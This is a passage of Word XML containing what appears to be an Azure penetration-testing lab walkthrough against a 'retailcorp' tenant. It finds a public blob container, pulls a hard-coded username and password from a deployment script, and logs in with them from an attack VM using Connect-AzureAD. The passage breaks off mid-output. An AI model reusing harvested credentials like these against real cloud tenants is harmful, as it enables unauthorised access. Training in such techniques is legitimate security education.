      <w:tr w:rsidR="005F73BB" w:rsidRPr="005F73BB" w14:paraId="29B3115C" w14:textId="77777777" w:rsidTr="005F73BB">
        <w:trPr>
          <w:trHeight w:val="240"/>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35DBE60" w14:textId="77777777" w:rsidR="005F73BB" w:rsidRPr="005F73BB" w:rsidRDefault="005F73BB" w:rsidP="005F73BB">
            <w:pPr>
              <w:spacing w:before="15"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Write-Progress : Cannot validate argument on parameter 'PercentComplete'. The 101 argument is greater than the maximum allowed range of 100. Supply an argument that is less than or equal to 100 and then try the command again.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2E5D3CDF" w14:textId="77777777" w:rsidR="005F73BB" w:rsidRPr="005F73BB" w:rsidRDefault="005F73BB" w:rsidP="005F73BB">
            <w:pPr>
              <w:spacing w:before="75"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[snip]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="49F5023D" w14:textId="77777777" w:rsidR="005F73BB" w:rsidRPr="005F73BB" w:rsidRDefault="005F73BB" w:rsidP="005F73BB">
            <w:pPr>
              <w:spacing w:before="30"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Found Container - retailcorp.blob.core.windows.net/configuration</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5763C616" w14:textId="77777777" w:rsidR="005F73BB" w:rsidRPr="005F73BB" w:rsidRDefault="005F73BB" w:rsidP="005F73BB">
            <w:pPr>
              <w:spacing w:before="15"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Public File Available:</w:t>
            </w:r>
            <w:r w:rsidRPr="005F73BB">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="005F73BB">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FBE4D5"/>
              </w:rPr>
              <w:t>https://retailcorp.blob.core.windows.net/configuration/PAS_Deployment_Scrip</w:t>
            </w:r>
            <w:r w:rsidRPr="005F73BB">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t> t.ps1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="55ADC851" w14:textId="77777777" w:rsidR="005F73BB" w:rsidRPr="005F73BB" w:rsidRDefault="005F73BB" w:rsidP="005F73BB">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FAFBFB"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>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br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="06EAB9B9" w14:textId="77777777" w:rsidR="005F73BB" w:rsidRPr="005F73BB" w:rsidRDefault="005F73BB" w:rsidP="005F73BB">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FAFBFB"/>
        <w:spacing w:before="105" w:after="0" w:line="270" w:lineRule="atLeast"/>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There is a script available in a container called 'configuration'. Let's check out its contents!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75E3B011" w14:textId="77777777" w:rsidR="005F73BB" w:rsidRPr="005F73BB" w:rsidRDefault="005F73BB" w:rsidP="005F73BB">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FAFBFB"/>
        <w:spacing w:before="225" w:after="0" w:line="270" w:lineRule="atLeast"/>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lastRenderedPageBreak/>
        <w:t>The script seems to be a VM deployment script and it contains a username and password in clear-text in very first lines!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AE66F6B" w14:textId="77777777" w:rsidR="005F73BB" w:rsidRPr="005F73BB" w:rsidRDefault="005F73BB" w:rsidP="005F73BB">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FAFBFB"/>
        <w:spacing w:before="240" w:after="0" w:line="375" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Nunito" w:eastAsia="Times New Roman" w:hAnsi="Nunito" w:cs="Times New Roman"/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005F73BB">
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console" w:eastAsia="Times New Roman" w:hAnsi="Lucida Console" w:cs="Times New Roman"/>
          <w:color w:val="FF4500"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>$password </w:t>
      </w:r>
      <w:r w:rsidRPr="005F73BB">
        <w:rPr>
          <w:rFonts w:ascii="Nunito" w:eastAsia="Times New Roman" w:hAnsi="Nunito" w:cs="Times New Roman"/>
          <w:color w:val="A9A9A9"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>= </w:t>
      </w:r>
      <w:r w:rsidRPr="005F73BB">
        <w:rPr>
          <w:rFonts w:ascii="Nunito" w:eastAsia="Times New Roman" w:hAnsi="Nunito" w:cs="Times New Roman"/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>ConvertTo-SecureString </w:t>
      </w:r>
      <w:r w:rsidRPr="005F73BB">
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console" w:eastAsia="Times New Roman" w:hAnsi="Lucida Console" w:cs="Times New Roman"/>
          <w:color w:val="8B0000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>'ZuqK&amp;ijv0085VnCI&amp;#' </w:t>
      </w:r>
      <w:r w:rsidRPr="005F73BB">
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console" w:eastAsia="Times New Roman" w:hAnsi="Lucida Console" w:cs="Times New Roman"/>
          <w:color w:val="000080"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>-AsPlainText -Force </w:t>
      </w:r>
      <w:r w:rsidRPr="005F73BB">
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console" w:eastAsia="Times New Roman" w:hAnsi="Lucida Console" w:cs="Times New Roman"/>
          <w:color w:val="FF4500"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>$creds </w:t>
      </w:r>
      <w:r w:rsidRPr="005F73BB">
        <w:rPr>
          <w:rFonts w:ascii="Nunito" w:eastAsia="Times New Roman" w:hAnsi="Nunito" w:cs="Times New Roman"/>
          <w:color w:val="A9A9A9"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>= </w:t>
      </w:r>
      <w:r w:rsidRPr="005F73BB">
        <w:rPr>
          <w:rFonts w:ascii="Nunito" w:eastAsia="Times New Roman" w:hAnsi="Nunito" w:cs="Times New Roman"/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>New-Object </w:t>
      </w:r>
      <w:r w:rsidRPr="005F73BB">
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console" w:eastAsia="Times New Roman" w:hAnsi="Lucida Console" w:cs="Times New Roman"/>
          <w:color w:val="8A2BE2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>System.Management.Automation.PSCredential</w:t>
      </w:r>
      <w:r w:rsidRPr="005F73BB">
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console" w:eastAsia="Times New Roman" w:hAnsi="Lucida Console" w:cs="Times New Roman"/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="005F73BB">
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console" w:eastAsia="Times New Roman" w:hAnsi="Lucida Console" w:cs="Times New Roman"/>
          <w:color w:val="8B0000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>'PIMUser@retailcorp.onmicrosoft.com'</w:t>
      </w:r>
      <w:r w:rsidRPr="005F73BB">
        <w:rPr>
          <w:rFonts w:ascii="Nunito" w:eastAsia="Times New Roman" w:hAnsi="Nunito" w:cs="Times New Roman"/>
          <w:color w:val="A9A9A9"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>, </w:t>
      </w:r>
      <w:r w:rsidRPr="005F73BB">
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console" w:eastAsia="Times New Roman" w:hAnsi="Lucida Console" w:cs="Times New Roman"/>
          <w:color w:val="FF4500"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>$Password</w:t>
      </w:r>
      <w:r w:rsidRPr="005F73BB">
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console" w:eastAsia="Times New Roman" w:hAnsi="Lucida Console" w:cs="Times New Roman"/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="354D1D6F" w14:textId="77777777" w:rsidR="005F73BB" w:rsidRPr="005F73BB" w:rsidRDefault="005F73BB" w:rsidP="005F73BB">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FAFBFB"/>
        <w:spacing w:after="0" w:line="375" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Nunito" w:eastAsia="Times New Roman" w:hAnsi="Nunito" w:cs="Times New Roman"/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005F73BB">
        <w:rPr>
          <w:rFonts w:ascii="Nunito" w:eastAsia="Times New Roman" w:hAnsi="Nunito" w:cs="Times New Roman"/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>Connect-AzAccount </w:t>
      </w:r>
      <w:r w:rsidRPr="005F73BB">
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console" w:eastAsia="Times New Roman" w:hAnsi="Lucida Console" w:cs="Times New Roman"/>
          <w:color w:val="000080"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>-Credential </w:t>
      </w:r>
      <w:r w:rsidRPr="005F73BB">
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console" w:eastAsia="Times New Roman" w:hAnsi="Lucida Console" w:cs="Times New Roman"/>
          <w:color w:val="FF4500"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>$Cred</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A6F02B0" w14:textId="77777777" w:rsidR="005F73BB" w:rsidRPr="005F73BB" w:rsidRDefault="005F73BB" w:rsidP="005F73BB">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FAFBFB"/>
        <w:spacing w:before="180" w:after="0" w:line="375" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console" w:eastAsia="Times New Roman" w:hAnsi="Lucida Console" w:cs="Times New Roman"/>
          <w:color w:val="8B0000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005F73BB">
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console" w:eastAsia="Times New Roman" w:hAnsi="Lucida Console" w:cs="Times New Roman"/>
          <w:color w:val="FF4500"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>$resourceGroup </w:t>
      </w:r>
      <w:r w:rsidRPr="005F73BB">
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console" w:eastAsia="Times New Roman" w:hAnsi="Lucida Console" w:cs="Times New Roman"/>
          <w:color w:val="A9A9A9"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>= </w:t>
      </w:r>
      <w:r w:rsidRPr="005F73BB">
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console" w:eastAsia="Times New Roman" w:hAnsi="Lucida Console" w:cs="Times New Roman"/>
          <w:color w:val="8B0000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>"PIMManagement" </w:t>
      </w:r>
      <w:r w:rsidRPr="005F73BB">
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console" w:eastAsia="Times New Roman" w:hAnsi="Lucida Console" w:cs="Times New Roman"/>
          <w:color w:val="FF4500"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>$location </w:t>
      </w:r>
      <w:r w:rsidRPr="005F73BB">
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console" w:eastAsia="Times New Roman" w:hAnsi="Lucida Console" w:cs="Times New Roman"/>
          <w:color w:val="A9A9A9"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>= </w:t>
      </w:r>
      <w:r w:rsidRPr="005F73BB">
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console" w:eastAsia="Times New Roman" w:hAnsi="Lucida Console" w:cs="Times New Roman"/>
          <w:color w:val="8B0000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>"Germany West Central" </w:t>
      </w:r>
      <w:r w:rsidRPr="005F73BB">
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console" w:eastAsia="Times New Roman" w:hAnsi="Lucida Console" w:cs="Times New Roman"/>
          <w:color w:val="FF4500"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>$vmName </w:t>
      </w:r>
      <w:r w:rsidRPr="005F73BB">
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console" w:eastAsia="Times New Roman" w:hAnsi="Lucida Console" w:cs="Times New Roman"/>
          <w:color w:val="A9A9A9"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>= </w:t>
      </w:r>
      <w:r w:rsidRPr="005F73BB">
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console" w:eastAsia="Times New Roman" w:hAnsi="Lucida Console" w:cs="Times New Roman"/>
          <w:color w:val="8B0000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>"PAS"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FC71233" w14:textId="77777777" w:rsidR="005F73BB" w:rsidRPr="005F73BB" w:rsidRDefault="005F73BB" w:rsidP="005F73BB">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FAFBFB"/>
        <w:spacing w:after="0" w:line="180" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console" w:eastAsia="Times New Roman" w:hAnsi="Lucida Console" w:cs="Times New Roman"/>
          <w:color w:val="8B0000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005F73BB">
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console" w:eastAsia="Times New Roman" w:hAnsi="Lucida Console" w:cs="Times New Roman"/>
          <w:color w:val="FF4500"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>$Subscription </w:t>
      </w:r>
      <w:r w:rsidRPr="005F73BB">
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console" w:eastAsia="Times New Roman" w:hAnsi="Lucida Console" w:cs="Times New Roman"/>
          <w:color w:val="A9A9A9"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>= </w:t>
      </w:r>
      <w:r w:rsidRPr="005F73BB">
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console" w:eastAsia="Times New Roman" w:hAnsi="Lucida Console" w:cs="Times New Roman"/>
          <w:color w:val="8B0000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>"27ebe5b9-6e27-425a-8117-eeaab022575f"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5311F675" w14:textId="77777777" w:rsidR="005F73BB" w:rsidRPr="005F73BB" w:rsidRDefault="005F73BB" w:rsidP="005F73BB">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FAFBFB"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>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br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="7328CEBA" w14:textId="77777777" w:rsidR="005F73BB" w:rsidRPr="005F73BB" w:rsidRDefault="005F73BB" w:rsidP="005F73BB">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FAFBFB"/>
        <w:spacing w:after="0" w:line="180" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console" w:eastAsia="Times New Roman" w:hAnsi="Lucida Console" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005F73BB">
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console" w:eastAsia="Times New Roman" w:hAnsi="Lucida Console" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>[snip]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F8FA8CE" w14:textId="77777777" w:rsidR="005F73BB" w:rsidRPr="005F73BB" w:rsidRDefault="005F73BB" w:rsidP="005F73BB">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FAFBFB"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Nunito" w:eastAsia="Times New Roman" w:hAnsi="Nunito" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="454BF520" w14:textId="77777777" w:rsidR="005F73BB" w:rsidRPr="005F73BB" w:rsidRDefault="005F73BB" w:rsidP="005F73BB">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="435EBE"/>
        <w:spacing w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:outlineLvl w:val="5"/>
        <w:rPr>
          <w:rFonts w:ascii="Nunito" w:eastAsia="Times New Roman" w:hAnsi="Nunito" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005F73BB">
        <w:rPr>
          <w:rFonts w:ascii="Nunito" w:eastAsia="Times New Roman" w:hAnsi="Nunito" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>Enumeration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E07A412" w14:textId="77777777" w:rsidR="005F73BB" w:rsidRPr="005F73BB" w:rsidRDefault="005F73BB" w:rsidP="005F73BB">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FAFBFB"/>
        <w:spacing w:before="30" w:after="0" w:line="285" w:lineRule="atLeast"/>
        <w:jc w:val="both"/>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Let's use the credentials of the user PIMUser that we got above and connect to the retailcorp tenant! Make sure that the Azure AD and Az PowerShell modules are installed on the attack VM that you have setup.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="562DF90A" w14:textId="77777777" w:rsidR="005F73BB" w:rsidRPr="005F73BB" w:rsidRDefault="005F73BB" w:rsidP="005F73BB">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FAFBFB"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Nunito" w:eastAsia="Times New Roman" w:hAnsi="Nunito" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="13500" w:type="dxa"/>
        <w:tblCellMar>
          <w:left w:w="0" w:type="dxa"/>
          <w:right w:w="0" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="13500"/>
      </w:tblGrid>
      <w:tr w:rsidR="005F73BB" w:rsidRPr="005F73BB" w14:paraId="2F10D4CC" w14:textId="77777777" w:rsidTr="005F73BB">
        <w:trPr>
          <w:trHeight w:val="240"/>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CB7DECF" w14:textId="77777777" w:rsidR="005F73BB" w:rsidRPr="005F73BB" w:rsidRDefault="005F73BB" w:rsidP="005F73BB">
            <w:pPr>
              <w:shd w:val="clear" w:color="auto" w:fill="FBE4D5"/>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shd w:val="clear" w:color="auto" w:fill="FBE4D5"/>
              </w:rPr>
              <w:t>PS C:\AzAD\Tools&gt; </w:t>
            </w:r>
            <w:r w:rsidRPr="005F73BB">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>$password = ConvertTo-SecureString 'ZuqK&amp;ijv0085VnCI&amp;#' -AsPlainText -Force</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="74EB6D6F" w14:textId="77777777" w:rsidR="005F73BB" w:rsidRPr="005F73BB" w:rsidRDefault="005F73BB" w:rsidP="005F73BB">
            <w:pPr>
              <w:spacing w:before="15"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PS C:\AzAD\Tools&gt; $creds = New-Object System.Management.Automation.PSCredential('PIMUser@retailcorp.onmicrosoft.com', $password)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="06D22B0C" w14:textId="77777777" w:rsidR="005F73BB" w:rsidRPr="005F73BB" w:rsidRDefault="005F73BB" w:rsidP="005F73BB">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005F73BB">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:br/>
            </w:r>
          </w:p>
          <w:p w14:paraId="47CA183E" w14:textId="77777777" w:rsidR="005F73BB" w:rsidRPr="005F73BB" w:rsidRDefault="005F73BB" w:rsidP="005F73BB">
            <w:pPr>
              <w:spacing w:before="45"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PS C:\AzAD\Tools&gt; Connect-AzureAD -Credential $creds</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="33C05A85" w14:textId="77777777" w:rsidR="005F73BB" w:rsidRPr="005F73BB" w:rsidRDefault="005F73BB" w:rsidP="005F73BB">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FBE4D5"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Nunito" w:eastAsia="Times New Roman" w:hAnsi="Nunito" w:cs="Times New Roman"/>
          <w:vanish/>
          <w:color w:val="000000"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="9090" w:type="dxa"/>
        <w:tblCellMar>
          <w:left w:w="0" w:type="dxa"/>
          <w:right w:w="0" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2370"/>
        <w:gridCol w:w="3240"/>
        <w:gridCol w:w="3480"/>
      </w:tblGrid>
      <w:tr w:rsidR="005F73BB" w:rsidRPr="005F73BB" w14:paraId="25ACBD6D" w14:textId="77777777" w:rsidTr="005F73BB">
        <w:trPr>
          <w:trHeight w:val="240"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="237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55D73EF"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Account</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="32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D358CF1"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Environment</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="348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2A6CA96E"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TenantId</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005F73BB" w:rsidRPr="005F73BB" w14:paraId="419EBCFA" w14:textId="77777777" w:rsidTr="005F73BB">
        <w:trPr>
          <w:trHeight w:val="240"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="237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EEBB79E"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TenantDomain</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="32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3F00B01"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AccountType</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="348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AE300B4"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r w:rsidR="005F73BB" w:rsidRPr="005F73BB" w14:paraId="7641B946" w14:textId="77777777" w:rsidTr="005F73BB">
        <w:trPr>
          <w:trHeight w:val="255"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="237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1C49685"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c>
          <w:tcPr>
            <w:tcW w:w="32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DCF1BAB" w14:textId="77777777" w:rsidR="005F73BB" w:rsidRPr="005F73BB" w:rsidRDefault="005F73BB" w:rsidP="005F73BB">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="atLeast"/>
              <w:jc w:val="righ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c>
          <w:tcPr>
            <w:tcW w:w="348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D656789" w14:textId="77777777" w:rsidR="005F73BB" w:rsidRPr="005F73BB" w:rsidRDefault="005F73BB" w:rsidP="005F73BB">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="atLeast"/>
              <w:jc w:val="righ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r>
      <w:tr w:rsidR="005F73BB" w:rsidRPr="005F73BB" w14:paraId="78C610DA" w14:textId="77777777" w:rsidTr="005F73BB">
        <w:trPr>
          <w:trHeight w:val="255"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="237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526DAFB6"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c>
          <w:tcPr>
            <w:tcW w:w="32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54FAA791" w14:textId="77777777" w:rsidR="005F73BB" w:rsidRPr="005F73BB" w:rsidRDefault="005F73BB" w:rsidP="005F73BB">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="atLeast"/>
              <w:jc w:val="righ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c>
          <w:tcPr>
            <w:tcW w:w="348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2EFB4656"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r w:rsidR="005F73BB" w:rsidRPr="005F73BB" w14:paraId="7FADD40A" w14:textId="77777777" w:rsidTr="005F73BB">
        <w:trPr>
          <w:trHeight w:val="270"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5610" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FBE4D5"/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="61818390"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PIMUser@retailcorp.onmicrosoft.com AzureCloud</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="348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0A11BA1"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711c59fe-8dee-40c0-adc1-</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005F73BB" w:rsidRPr="005F73BB" w14:paraId="51BB771B" w14:textId="77777777" w:rsidTr="005F73BB">
        <w:trPr>
          <w:trHeight w:val="255"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5610" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FBE4D5"/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
